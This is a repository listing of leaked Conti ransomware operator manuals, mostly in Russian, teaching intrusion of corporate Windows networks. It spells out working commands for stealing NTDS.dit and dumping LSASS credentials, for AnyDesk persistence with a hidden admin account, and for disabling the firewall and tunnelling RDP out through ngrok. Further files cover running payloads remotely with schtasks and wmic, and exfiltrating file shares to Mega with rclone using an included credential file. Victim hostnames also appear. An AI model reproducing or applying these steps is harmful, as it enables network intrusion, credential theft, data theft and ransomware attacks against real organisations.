├── CobaltStrike MANUAL_V2 .docx ├── MANUALS ├── 2load.txt ├── 3 # AV.7z ├── DAMP NTDS.txt ├── Kerber-ATTACK.rar ├── NetScan.txt ├── PENTEST SQL.txt ├── ProxifierPE.zip ├── RDP NGROK.txt ├── RMM_Client.exe ├── RouterScan.txt ├── Routerscan.7z ├── SQL DAMP.txt ├── ad_users.txt ├── asdasd ├── domains.txt ├── enhancement-chain.7z ├── p.bat ├── rclone.conf ├── Аллиасы для мсф.rar ├── Анонимность для параноиков.txt ├── ДАМП LSASS.txt ├── Если необходимо отсканить всю сетку одним листом.txt ├── Закреп AnyDesk.txt ├── Заменяем sorted адфиндера.txt ├── КАК ДЕЛАТЬ ПИНГ (СЕТИ).txt ├── КАК ДЕЛАТЬ СОРТЕД СОБРАННОГО АД!!!!.txt ├── КАК И КАКУЮ ИНФУ КАЧАТЬ.txt ├── КАК ПРЫГАТЬ ПО СЕССИЯМ С ПОМОЩЬЮ ПЕЙЛОАД.txt ├── Личная безопасность.txt ├── МАНУАЛ.txt ├── Мануал робота с AD DC.txt ├── Меняем RDP порт.txt ├── ОТКЛЮЧЕНИЕ ДЕФЕНДЕРА ВРУЧНУЮ.txt ├── ПЕРВОНАЧАЛЬНЫЕ ДЕЙСТВИЯ.txt ├── ПОВИЩЕНИЯ ПРИВИЛЕГИЙ.txt ├── ПРОСТАВЛЕНИЕ.txt ├── Получение доступа к серверу с бекапами Shadow Protect SPX (StorageCraft).txt ├── Рабочая станция на работу через Tor сетїь.txt ├── Рабочий скрипт создания VPS сервера для тестирования на проникноваение от A до Z.txt ├── СМБ АВТОБРУТ.txt ├── СНЯТИЕ-AD.rar ├── Сайт создание батникоd.txt ├── Скрипт для sorted .rar ├── Список ТГ форумов, много интересного.txt ├── Установка метасплойт на впс.txt ├── Эксплуатация CVE-2020-1472 Zerologon в Cobalt Strike.txt ├── параметр запуска локера на линукс версиях.txt ├── по отключению дефендера.txt ├── поднятие прав (дефолт).txt ├── хантинг админов, прошу ознакомиться, очень полезно!!.txt └── это установка армитажа. ставится поверх Metasploit ├── Manual_CS.txt └── README.md /CobaltStrike MANUAL_V2 .docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ForbiddenProgrammer/conti-pentester-guide-leak/42a05a977fad38a564789f62d781b0f60d712210/CobaltStrike MANUAL_V2 .docx -------------------------------------------------------------------------------- /MANUALS/2load.txt: -------------------------------------------------------------------------------- 1 | \\exampleT1600-PC.example.com\jfhg 2 | \\example-WS015.example.com\jfhg4 3 | \\example-WS031.example.com\jfhg8 4 | \\example-UPS3.example.com\jfhg6 5 | \\example-WS032.example.com\jfhg2 6 | \\example-UPS2.example.com\jfhg44 7 | \\example-UPS1.example.com\jfhg554 8 | \\example-LT005.example.com\jfhg987 9 | \\example-LAPTOP.example.com\jfhg9786 10 | \\example-LT008.example.com\jfhg876 11 | \\example-WS034.example.com\jfhg675765 12 | \\example-WS036.example.com\jfhg5674 13 | \\example-WS035.example.com\jfhg856 14 | \\example-GRAPHICS7.example.com\jfhg7856 15 | \\example-WS037.example.com\jfhg876 16 | \\example-WS038.example.com\jfhg 17 | -------------------------------------------------------------------------------- /MANUALS/3 # AV.7z: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ForbiddenProgrammer/conti-pentester-guide-leak/42a05a977fad38a564789f62d781b0f60d712210/MANUALS/3 # AV.7z -------------------------------------------------------------------------------- /MANUALS/DAMP NTDS.txt: -------------------------------------------------------------------------------- 1 | Способ беспалевного ДАМПА НТДС 2 | shell wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c vssadmin list shadows >> c:\log.txt" 3 | 4 | 5 | делаем запрос на листинг шэдоу копий, там есть указание даты, проверьте чтобы была свежая дата 6 | почти наверняка они там уже есть, если нет то делаем сами 7 | 8 | net start Volume Shadow Copy 9 | shell wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c vssadmin create shadow /for=C: 2>&1" 10 | 11 | 12 | далее в листинге шэдоу копий находим самую свежую 13 | Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55 14 | соответственно нам нужен номер копии для следующей команды 15 | 16 | 17 | shell wmic /node:"DC01" /user:"DOMAIN\admin" /password:"cleartextpass" process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\NTDS\NTDS.dit c:\temp\log\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SYSTEM c:\temp\log\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SECURITY c:\temp\log\" 18 | 19 | 20 | в c:\temp\log\ должны упасть файлы ntds.dit / security / system 21 | берём портативный консольный 7з и пакуем в архив с паролем 22 | Код: [Выделить] 23 | 24 | 7za.exe a -tzip -mx5 \\DC01\C$\temp\log.zip \\DC01\C$\temp\log -pTOPSECRETPASSWORD 25 | 26 | 27 | выкачиваем запароленный архив себе, если при декрипте файла нтдс получаем ошибку (файл повреждён), то делаем следующее 28 | 29 | 30 | Esentutl /p C:\log\ntds.dit 31 | 32 | 33 | хитрость этого способа в том, что мы по факту ничего не дампим, мы просто берём и выкачиваем нтдс 34 | чтобы не спалиться тем что вытаскиваем именно нтдс мы пакуем его в запароленный архив 35 | 36 | если у вас траблы с тем, что палят и выкидывают из сети после дампа нтдс - пробуйте этот способ 37 | его спалить можно только самим фактом какой-то утекающей даты с КД, причём проанализировать что именно вы тащите не зная пароль от архива невозможно -------------------------------------------------------------------------------- /MANUALS/Kerber-ATTACK.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ForbiddenProgrammer/conti-pentester-guide-leak/42a05a977fad38a564789f62d781b0f60d712210/MANUALS/Kerber-ATTACK.rar -------------------------------------------------------------------------------- /MANUALS/NetScan.txt: -------------------------------------------------------------------------------- 1 | Замечательный инструмент-NetScan, который облегчает разведку и поиск NAS\Backup и т.д. 2 | Сканирует сети по диапазонам, используя креды юзера\админа, от имени которого запустили софт. 3 | Выдаёт cледующую информацию: 4 | Имя хоста, открытые порты, принадлежность к группе\домену, общий объём дисков, доступные шары, производитель устройства, роль ПК\сервера 5 | 6 | 1) Грузим папку NetScan на любой заражённый ПК. Допустим, C:\Programdata\netscan 7 | 8 | 2) cd C:\programdata\netscan 9 | 10 | 3) make_token DOMAIN\admin password 11 | 12 | 4) shell netscan.exe /hide /auto:"result.xml" /config:netscan.xml /range:192.168.0.1-192.168.1.255 13 | Меняем диапазоны на свои, остальное не трогаем 14 | 15 | 5) Ждём. После завершения у нас в папке появится файл result.xml, выкачиваем его себе на комп 16 | 17 | 6) Открываем NetScan у себя на винде, подгружаем туда выкачанный файл и смотрим результат в удобном формате. 18 | Сортируем по размеру диска, так вы сразу поймёте, где самый сок спрятан 19 | 20 | Отдельное спасибо Perry за помощь в поиске техдокументации, на основе которой написан данный мануал. 21 | Sonic, можно добавить NetScan в алгоритм -------------------------------------------------------------------------------- /MANUALS/PENTEST SQL.txt: -------------------------------------------------------------------------------- 1 | https://github.com/NetSPI/PowerUpSQL/wiki 2 | так же для работы с SQL -------------------------------------------------------------------------------- /MANUALS/ProxifierPE.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ForbiddenProgrammer/conti-pentester-guide-leak/42a05a977fad38a564789f62d781b0f60d712210/MANUALS/ProxifierPE.zip -------------------------------------------------------------------------------- /MANUALS/RDP NGROK.txt: -------------------------------------------------------------------------------- 1 | Регистрируемся на https://ngrok.com/ 2 | - Скачиваем ngrok.exe и загружаем на тачку 3 | 4 | В меню панели аккаунта ngrok выбираем "Your Authtoken" 5 | Копируем команду с токеном (без ./). Например: 6 | ngrok authtoken 1vZgA1BbLWyhSjIE0f36QG6derd_5fXEPgPp8ZLxbUg 7 | 8 | - Заходим в кобу на тачку и пишем: 9 | shell ngrok authtoken 1vZgA1BbLWyhSjIE0f36QG6derd_5fXEPgPp8ZLxbUg 10 | 11 | - Прокидываем туннель на РДП порт: 12 | shell ngrok tcp 3389 13 | 14 | - Открываем РДП на тачке: 15 | shell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f && reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f 16 | 17 | shell NetSh Advfirewall set allprofiles state off 18 | 19 | shell netsh advfirewall firewall set rule group="remote desktop" new enable=Yes 20 | 21 | shell netsh firewall set service type = remotedesktop mode = enable 22 | 23 | - Можем добавить отдельного пользователя под ngrok: 24 | shell net user Admin Password1 /add 25 | shell net localgroup Administrators Admin /add 26 | 27 | - Заходим в панель аккаунта ngrok - проверяем туннель ("Endpoints - Status"). 28 | Копируем IP:port оттуда и идем в любой RDP-клиент. Подключаемся (можно и тем аккаунтом, что мы создали). -------------------------------------------------------------------------------- /MANUALS/RMM_Client.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ForbiddenProgrammer/conti-pentester-guide-leak/42a05a977fad38a564789f62d781b0f60d712210/MANUALS/RMM_Client.exe -------------------------------------------------------------------------------- /MANUALS/RouterScan.txt: -------------------------------------------------------------------------------- 1 | Софт для виндовс, позволяет брутить роутеры, камеры, NASы некоторые(зависит от типа авторизации), если у них есть веб-интерфейс. 2 | Сначала пытается понять, что за устройство, потом применить подходящие к нему эксплоиты(ломает микротик даже, если прошивка ниже 6.12 за секунду и выдаёт пароль в чистом виде) 3 | Если эксплоитов под данную модель нет-то начинает брутить. Словари по необходимости подгружаем в 3 текстовых файла, начинающихся на auth_***.txt, лежащие в корне программы. В таком виде: 4 | логин пароль 5 | логин пароль 6 | Только не через пробел отступы, а через Tab 7 | Подникаем сокс на кобе, проксируем через ProxyFier, запускаем у себя на винде, выставляем диапазоны или конкретные ip, количество потоков(5 самое то) и timeout(это значение лучше повысить до 3000мс, чтобы не пропустить). Порты дефолтные уже указаны, можно добавить свои, если веб висит не на стандартных. В Scanning Module оставляем галочку на первом(Router scan main) и HNAP 1.0, остальные вам вряд ли пригодятся. Жмём start, ждём и надеемся на результат -------------------------------------------------------------------------------- /MANUALS/Routerscan.7z: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ForbiddenProgrammer/conti-pentester-guide-leak/42a05a977fad38a564789f62d781b0f60d712210/MANUALS/Routerscan.7z -------------------------------------------------------------------------------- /MANUALS/SQL DAMP.txt: -------------------------------------------------------------------------------- 1 | 0. посмотреть кто работает с базой (хосты и юзеры откуда к ней коннектились) 2 | shell sqlcmd -S localhost -Q "select loginame, hostname from sys.sysprocesses" 3 | 4 | 1. Вывод в кмд всех баз данных на сервере 5 | shell sqlcmd.exe -S localhost -E -Q "SELECT name FROM master.dbo.sysdatabases;" 6 | 7 | с размером в мегабайтах 8 | shell sqlcmd -S localhost -E -Q "SELECT d.name, ROUND(SUM(mf.size) * 8 / 1024, 0) FROM sys.master_files mf INNER JOIN sys.databases d ON d.database_id = mf.database_id WHERE d.database_id > 4 GROUP BY d.name ORDER BY d.name;" 9 | 10 | 2. Выгрузка 100 самых насыщенных по количество рядов таблиц в базе данных, количества рядов и размера таблиц на винче 11 | sqlcmd -S localhost -E -Q "USE %databasename% SELECT TOP 100 s.Name AS SchemaName, t.Name AS TableName, p.rows AS RowCounts, CAST(ROUND((SUM(a.total_pages) / 128.00), 2) AS NUMERIC(36, 2)) AS Total_MB FROM sys.tables t INNER JOIN sys.indexes i ON t.OBJECT_ID = i.object_id INNER JOIN sys.partitions p ON i.object_id = p.OBJECT_ID AND i.index_id = p.index_id INNER JOIN sys.allocation_units a ON p.partition_id = a.container_id INNER JOIN sys.schemas s ON t.schema_id = s.schema_id GRчфOUP BY t.Name, s.Name, p.Rows ORDER BY RowCounts desc, Total_MB desc;" 12 | 2.1. 13 | sqlcmd -S localhost -E -Q "USE %databasename% SELECT TOP 100 s.Name AS SchemaName, t.Name AS TableName, p.rows AS RowCounts, CAST(ROUND((SUM(a.total_pages) / 128.00), 2) AS NUMERIC(36, 2)) AS Total_MB FROM sys.tables t INNER JOIN sys.indexes i ON t.OBJECT_ID = i.object_id INNER JOIN sys.partitions p ON i.object_id = p.OBJECT_ID AND i.index_id = p.index_id INNER JOIN sys.allocation_units a ON p.partition_id = a.container_id INNER JOIN sys.schemas s ON t.schema_id = s.schema_id GROUP BY t.Name, s.Name, p.Rows ORDER BY RowCounts desc, Total_MB desc;" 14 | 15 | 3. Подсчет строк в конкретной таблице конкретной базы данных 16 | sqlcmd -S localhost -E -Q "select count(*) from %databasename%.dbo.%tablename%;" 17 | 18 | 4. Выгрузка первых 10 записей в конкретной таблице конкретной базы данных 19 | sqlcmd -S localhost -E -Q "select top 10 * from %databasename%.dbo.%tablename%;" 20 | sqlcmd -S localhost -E -Q "use %databasename%; select top 10 * from %tablename%" -W 21 | 22 | 5. Поиск по названиям колонок в конкретной базе данных на примере %pass% 23 | sqlcmd -S localhost -E -Q "select COLUMN_NAME as 'ColumnName', TABLE_NAME as 'TableName' from %databasename%.INFORMATION_SCHEMA.COLUMNS where COLUMN_NAME like '%pass%';" 24 | 25 | 6. Выгрузка данных содержимого конкретных колонок из определенной таблицы в txt файл на винч в папку (в данном примере по числому значению таблицы > даты 26 | sqlcmd.exe -S localhost -E -Q "select UserKey, EmailAddress, RealName, Phone, FirstName, LastName, CountryName, CreatedDate from %databasename%.dbo.%tablename% where CreatedDate > '2017-11-30';" -W -s"|" -o "C:\temp\123.txt" 27 | FULL > 28 | sqlcmd.exe -S localhost -E -Q "select * from %databasename%.dbo.%tablename%" -W -s"|" -o "C:\Windows\Temp\1.txt" 29 | 30 | 7. Вывод всех таблиц конкретной бд 31 | shell sqlcmd -S localhost -E -Q "use %databasename%; exec sp_tables" -W 32 | 33 | для удаленного/другого локального сервера меняем localhost на ip,port 34 | как вариант - localhost,%port% (смотреть нетстатом) 35 | 36 | Если таблица или база называется из 2-3-4 слов - то экранируется вот так [%databasename/tablename%] 37 | 38 | sqlcmd -E -S localhost -Q "BACKUP DATABASE databasename TO DISK='d:\adw.bak'" -------------------------------------------------------------------------------- /MANUALS/ad_users.txt: -------------------------------------------------------------------------------- 1 | расскажу еще момент про ad_users , там очень много информации о сотрудниках, там можно найти технарей, инженеров и тд. Нам обычно требуеться ad_users когда хотим найти тачку админа, потому что на тачках админа мы можем найти пороли от антивирусной консоли,от облачных бэкаппов и тд. Сейчас скину мануал по ЮЗЕРХАНТЕРУ, при помощи него, мы и находим эти тачки. Так же ad_users требуеться нам, чтоб взять от туда SID, для голден тикета, но об этом позже 2 | 1. составляем список таргетов 3 | 1.1 Открываем ад_юзерс , ищем там кто нам потенциально интересен : admin / инженер / информ технологи / ИТ 4 | забираем логины учеток из sAMAccountName 5 | 1.2 Берём список домен админов 6 | 1.3 кладём в файл list.txt первых и вторых 7 | 8 | 2. Аплоадим пауэр вью. 9 | 2.1 powershell-import _/home/user/soft/powerview/view.ps1_ 10 | 2.1 --коммент: импортируем пауэр вью из /home/user/soft/powerview/view.ps1 11 | 12 | 2.3 Врубаем хантинг 13 | 2.3.1 14 | psinject 1884 x64 Invoke-UserHunter -Threads 20 -UserFile C:\ProgramData\list.txt >> C:\ProgramData\out.txt 15 | 16 | вместо 1884 - ПИД процесса куда нам хватает прав сделать инжект. 17 | х64 - или х86 разрядность процесса. см в тасклист 18 | В с\программдата\лист.тхт должен лежать список который мы делали в пункт №1. 19 | через 5-10-20 минут смотреть резалт в аут.тхт. Как заканчивает сразу пополняет его разом. то есть если файл 0байт значит работает либо АВ попалил(если попалил ав то в кобе увидите) -------------------------------------------------------------------------------- /MANUALS/asdasd: -------------------------------------------------------------------------------- 1 | t 2 | -------------------------------------------------------------------------------- /MANUALS/domains.txt: -------------------------------------------------------------------------------- 1 | CLeichty 2 | sd-cernst-vista 3 | SDBUILD11 4 | sd-books-01 5 | sdt-xp-04 6 | DEV-SPARE 7 | MININT-N3JOUQL 8 | SDBUILD10 9 | sdmmarshall02 10 | gary-x60 11 | laptop07 12 | gary-x61 13 | cernstdesktop 14 | pkomosin01 15 | MININT-50C2BP7 16 | DESKTOP-PC 17 | SGRAY-PC 18 | MattHLaptop 19 | MattLauth-PC 20 | jimbendt 21 | laptop05 22 | sdbuild13 23 | nholli-laptop01 24 | rthomp01 25 | sdlaptop02 26 | SDT-Vista-01 27 | SDBuild19 28 | GHARPST-LAPTOP 29 | sdt-xp-01 30 | dedds01 31 | sdt-xp-02 32 | SDT-WIN7X64-01 33 | DKECK-OUTLOOK 34 | vern-laptop 35 | GHARPST01 36 | mheidepriem 37 | CWETHERILL2 38 | PKOMOSINSKI01 39 | GHARPST-X200 40 | six-d9db82df276 41 | jridge01 42 | banderson02 43 | SDT-Win8x64-01 44 | SDT-XP-03 45 | SD-EMailVerifier-01 46 | russ-PC 47 | bclark03 48 | SDD-Win8x64-01 49 | GMHII 50 | casey-PC 51 | GH-SURFACE 52 | mheidepriem01 53 | DKECK-WIN7 54 | SDT-Win81x64-01 55 | jbendt-01 56 | dkeck-VM 57 | sdt-vista-02 58 | sdt-xp-05 59 | VERN-THINK 60 | SDT-WIN7X86-02 61 | perload02 62 | MLAUTH01 63 | cernst-desktop 64 | XPS 65 | cernst01 66 | PHARTMAN01 67 | CASEY-D810 68 | SGRAY-PC1 69 | DellLatD830 70 | mheidepriemDesk 71 | DLOCKET01 72 | dlockert 73 | AutomatedTest 74 | COREYL-DESKTOP 75 | d410loaner 76 | DKECK-DESKTOP 77 | GH11 78 | WIN-DSICSJFMGTJ 79 | WIN-9CH5144SG63 80 | NStrong 81 | BLARK-E5530 82 | CASEY-ASUS 83 | Casey-Desktop 84 | SDT-Win10x64-01 85 | CWETHERILL 86 | DESKTOP-T6363GF 87 | GH-PC 88 | MHeidepriem03 89 | MHEIDEPRIEM02 90 | SDT-Win10x64-02 91 | SDBUILD-01 92 | SDT-Win8x86-01 93 | SDBUILD-02 94 | SS-SLATE 95 | Gary-Yoga 96 | SDT-WIN7X86-01 97 | BSI-PWD-01 98 | LOANER 99 | Wetherill 100 | SurfacePro3 101 | DESKTOP-K66L1AA 102 | SDS-NKOMOSINSKI 103 | blortied420 104 | casey-laptop 105 | Wetherill-Acer 106 | SDBUILD-LAP1 107 | davids-macbook 108 | SDBUILD14 109 | lenovocarbon 110 | VSTRONG-LENOVO 111 | SD-VERN-01 112 | CaseyAcer 113 | casey-dev 114 | DKECK-WORK 115 | dkeck-dev 116 | 6D-JHARPST-02 117 | Cory-Asus 118 | SIXD-TMACKE-L1 119 | rmortensen1 120 | 6d-jharpst-01 121 | CoreyL-Laptop 122 | rmortensen 123 | CoreyL-Dev 124 | -------------------------------------------------------------------------------- /MANUALS/enhancement-chain.7z: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ForbiddenProgrammer/conti-pentester-guide-leak/42a05a977fad38a564789f62d781b0f60d712210/MANUALS/enhancement-chain.7z -------------------------------------------------------------------------------- /MANUALS/p.bat: -------------------------------------------------------------------------------- 1 | for /f %%i in (domains.txt) do ping %%i -n 1 >> res.txt -------------------------------------------------------------------------------- /MANUALS/rclone.conf: -------------------------------------------------------------------------------- 1 | [Mega] 2 | type = mega 3 | user = lukas.kastro@yandex.ru 4 | pass = K1OPIwiH6dwNtHnqobSidvv0UHPZkgcfSuGDU6t3jA -------------------------------------------------------------------------------- /MANUALS/Аллиасы для мсф.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ForbiddenProgrammer/conti-pentester-guide-leak/42a05a977fad38a564789f62d781b0f60d712210/MANUALS/Аллиасы для мсф.rar -------------------------------------------------------------------------------- /MANUALS/Анонимность для параноиков.txt: -------------------------------------------------------------------------------- 1 | Пару замечаний к постам об анонимности для параноиков: 2 | 3 | 1. Задача не скрыться (всё равно не получится), а слиться с толпой. Так что отключив webrtc, Javascript, Flash и т.д. будите только больше внимания к себе привлекать. Нужно НЕ ОТКЛЮЧАТЬ, а ПОДМЕНЯТЬ то что позволяет вас обнаружить. 4 | 5 | 2. По поводу Kali и других ОС для хакеров. Вот есть группа людей (Хаккеров), которую нужно отследить. Технически эту задачу решить тяжело. Проще сыграть на человеческой слабости (лень) и собрать всех в кучу предоставив правильно разрекламированное, удобное, готовое и популярное решение. Думаю мысь понятна. Cоветую использовать Debian или собрать что-то свое. 6 | 7 | Saint спаибо за материал, добавил NetScan в алгоритм -------------------------------------------------------------------------------- /MANUALS/ДАМП LSASS.txt: -------------------------------------------------------------------------------- 1 | LSASS: 2 | метод через coba: (*** отдельное спасибо @Sven ) 3 | !* 1) getsystem 4 | 2) shell rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full (пид указываем от лсас) 5 | (снять на удаленной тачке) coba_wmic: 6 | shell wmic /node:[target] process call create "cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full" 7 | remote-exec psexec [target] cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full 8 | ======= 9 | метод через RDP: 10 | открываем taskmgr => PKM po lsass process => create Dump file. \\ Далее выкачиваем файл себе на комп, 11 | 12 | ======= 13 | как расхешить: 14 | открываем мимик и далее: 15 | privilege::debug 16 | sekurlsa::minidump A:\3.WORK\BL-ws20\lsass.DMP (путь заменяем до нашего файла) 17 | log 18 | sekurlsa::logonpasswords -------------------------------------------------------------------------------- /MANUALS/Если необходимо отсканить всю сетку одним листом.txt: -------------------------------------------------------------------------------- 1 | (*** отдельное спасибо @Versace ) 2 | если необходимо отсканить всю сетку одним листом то юзаем команду для адфинд: 3 | adfind.exe -f objectcategory=computer -csv name cn OperatingSystem dNSHostName > some.csv -------------------------------------------------------------------------------- /MANUALS/Закреп AnyDesk.txt: -------------------------------------------------------------------------------- 1 | Закреп AnyDesk - ознакомиться всем 2 | Function AnyDesk { 3 | 4 | mkdir "C:\ProgramData\AnyDesk" 5 | # Download AnyDesk 6 | $clnt = new-object System.Net.WebClient 7 | $url = "http://download.anydesk.com/AnyDesk.exe" 8 | $file = "C:\ProgramData\AnyDesk.exe" 9 | $clnt.DownloadFile($url,$file) 10 | 11 | 12 | cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent 13 | 14 | 15 | cmd.exe /c echo J9kzQ2Y0qO | C:\ProgramData\anydesk.exe --set-password 16 | 17 | 18 | net user oldadministrator "qc69t4B#Z0kE3" /add 19 | net localgroup Administrators oldadministrator /ADD 20 | reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 /f 21 | 22 | cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id 23 | 24 | } 25 | 26 | AnyDesk 27 | 28 | 29 | Выполняем код в Powershell ISE Run As Admin 30 | На выходе получаем ID 31 | Сохраняем его к себе 32 | На отдельном дедике\впс\виртуалке скачиваем Anydesk указываем ID 33 | Жмем Console Account 34 | Вводим пароль 35 | Цитировать 36 | 37 | J9kzQ2Y0qO 38 | 39 | И далее авторизываемся локальным админом либо доменной учеткой и пользуемся прелестями Anydesk 40 | Также можно скачать\загрузить на\с машину жертвы что бывает удобно в осмотре и поиске документации точечно. 41 | 42 | -------------------------------------------------------------------------------- /MANUALS/Заменяем sorted адфиндера.txt: -------------------------------------------------------------------------------- 1 | Можно запускать пелойд или какой нибудь батник при помощи ШТАСКА 2 | shell SCHTASKS /s айпи\хостнейм /RU "SYSTEM" /create /tn "WindowsSensor15" /tr "cmd.exe /c C:\ProgramData\P32.exe" /sc ONCE /sd 01/01/1970 /st 00:00 3 | shell SCHTASKS /s айпи\хостнейм /run /TN "WindowsSensor15" 4 | shell schtasks /S айпи\хостнейм /TN "WindowsSensor15" /DELETE /F 5 | 6 | запуск длл пелойда выглядит так 7 | shell wmic /node:172.16.0.36 process call create "rundll32.exe C:\ProgramData\p64.dll StartW" 8 | 9 | shell wmic /node:10.28.0.3 process call create "C:\ProgramData\j1.exe" 10 | Запуск EXE пелойда -------------------------------------------------------------------------------- /MANUALS/КАК ДЕЛАТЬ ПИНГ (СЕТИ).txt: -------------------------------------------------------------------------------- 1 | 2 | +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ КАК ДЕЛАТЬ ПИНГ +++++++++++++++++++++++++++++++++++++++++++++++++++++ 3 | 1. СОЗДАЕМ НА РАБОЧЕМ СТОЛЕ TXT ФАЙЛ С НАЗВАНИЕ domains.txt 4 | 2. У ВАС ЕСТЬ СОРТЕД ИЛИ ПРОСТО ЛОКАЛЬНЫЕ ИМЕНА КОМПЮТЕРОВ ЗАНОСИМ ИХ В ЭТОТ ФАЙЛ 5 | 3. ЗАЛИВАЕМ НА МАШИНУ (C:\ProgramData\) С КОТОРОЙ БУДЕТ ИДТИ ПИНГ ФАЙЛ domains.txt и p.bat 6 | 4. ЗАПУСКАЕМ p.bat С ПОМОЩЬЮ КОМАНДЫ shell 7 | 5. ПОСЛЕ ПИНГА СКАЧИВАЕМ ФАЙЛ res.txt 8 | 9 | ----------------------------------- КАК БЫСТРО ДОСТАТЬ ИП В ЧИСТОМ ВИДЕ С РАСПИНГОВАННЫХ МАШИН ---------------------------------- 10 | 1. У ВАС ЕСТЬ ФАЙ res.txt, ОТКРЫВАЕМ ЕГО В NOTEPAD++ 11 | 2.ЖМЕМ CTRL+F В ПОИСКОВУЮ СТРОКУ ВВОДИМ TTL 12 | 3.ЖМЕМ FIND ALL IN CURRENT DOCUMENT У ВАС СНИЗУ ПОЯВИТСЯ ОКНО С ИП 13 | 4. ИДЕМ НА САЙТ en.toolpage.org/tool/ipv4-extractor ТАМ ВСТАВЛЯЕМ ВСЕ ЧТО ПОЛУЧИЛОСЬ И ПОЛУЧАЕМ ЧИСТЫЕ ИП 14 | 15 | 16 | САЙТ ДЛЯ БРУТА ПРОСТЫХ ХЭШЕЙ 17 | 18 | -----------> hashes.com 19 | ================================================================================================================================= -------------------------------------------------------------------------------- /MANUALS/КАК ДЕЛАТЬ СОРТЕД СОБРАННОГО АД!!!!.txt: -------------------------------------------------------------------------------- 1 | Как сортировать собраный АД с сети 2 | 1)Скачиваем FileZilla 3 | 4 | 5 | 2)Скачиваем Putty,пускаем Putty через тор 6 | 7 | Идем сюда torproject.org/download/tor/ 8 | 9 | Качае ВНИМАНИЕ Expert Bundle 10 | 11 | Разархивируем, идем в каталог Tor и запускаем tor.exe 12 | 13 | Через несколько секунд дойдет до написи 100% Done 14 | 15 | В настройках Putty заходим в прокси, ставим сокс5, айпи 127.0.0.1 порт 9050 16 | 17 | 3)Заходим через файлзиллу на сервер > заходи в директорию "Script" - кладем рядом со скриптом АД файлы 18 | 19 | 4) Переходим в Putty, заходим на сервер, переходи в директорию где лежит скрипт, даем команду 20 | ./script.sh 21 | 22 | 5) Готово, заходи обратно в FilleZilla и забираем наш сортед. После себя обязательно удляйте файлы АД и папку сортед, если папка сортед не удалятеся, просто переменуйте ее в любое название -------------------------------------------------------------------------------- /MANUALS/КАК И КАКУЮ ИНФУ КАЧАТЬ.txt: -------------------------------------------------------------------------------- 1 | 1) После того как мы подняли права, нашли Домен Админа, мы тянем сесии в кобальт 2 | 2)Одеваем токен ДА и Снимаем шары таким образом : 3 | *powershell-import - аплоудим туда ShareFinder как обычно и комнаду даем следущюю - 4 | psinject 7080 x64 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\found_shares.txt 5 | 6 | Далее изучаем снятые шары , нас интересуют 7 | *Финанс доки 8 | *Бухгалтерия 9 | *Айти 10 | *Клиенты 11 | *Проекты 12 | И так далее, все зависит от того,чем занимаеться наш таргет 13 | 14 | Далее делаем следущее > вот Мануал от Diablo , все лего доступно и понятно 15 | 16 | Рклон 17 | для того что бы начать скачивать через рклон нужно создать конфиг 18 | для создания конфига необходимо открыть cmd перейти в дирикторию туда где лежит rclone.exe 19 | запускаем rclone.exe с помощью команды : rclone config 20 | далее выбираем в появившемся меню new remote 21 | называем его mega потом еще раз вводим мега 22 | после этого вводим адрес почты меги после он спросит свой пасс вводить или сгенерировать мы выбираем свой буквой 'Y' 23 | пасс не будет появляться при вставке однако он туда все равно вставляется 24 | после создания конфига нас выбрасывает в главное меню и мы выходит из рклона. 25 | далее вводим эту команду rclone.exe config show она покажет сам конфиг который мы создали 26 | его мы копируем и создаем фаил rclone.conf куда и кладем эту инфу. 27 | поссле того как мы нашли интересующие нас шары мы загружаем exe и конфиг на таргет машину с правами прячем конфиг и экзешку что бы их не нашли 28 | переходим в дерикторию экзешки и даем команду: shell rclone.exe copy "\\envisionpharma.com\IT\KLSHARE" Mega:Finanse -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 29 | где: \\envisionpharma.com\IT\KLSHARE это шары 30 | Mega:Finanse расположение файлов в меге (может самостоятельно создавать папку в мегу стоит только тут ее указать) 31 | streams 12 --transfers 12 это колличество потоков которые качают на максимум(12) не рекомендую так как можно легко спалиться 32 | 33 | 34 | 35 | shell rclone.exe copy "\\PETERLENOVO.wist.local\Users" ftp1:uploads/Users/ -q --ignore-existing --auto-confirm --multi-thread-streams 3 --transfers 3 - вот пример в данном случае на ФТП 36 | 37 | !!!САМ РКЛОН ВЕСИТ ПОРЯДКА 50МБ, ССЫЛКА НА НЕГО БУДЕТ НИЖЕ ПОСТА!!! -------------------------------------------------------------------------------- /MANUALS/КАК ПРЫГАТЬ ПО СЕССИЯМ С ПОМОЩЬЮ ПЕЙЛОАД.txt: -------------------------------------------------------------------------------- 1 | Команды для запуска пелойда, что бы подтянуть сессию в кобальт 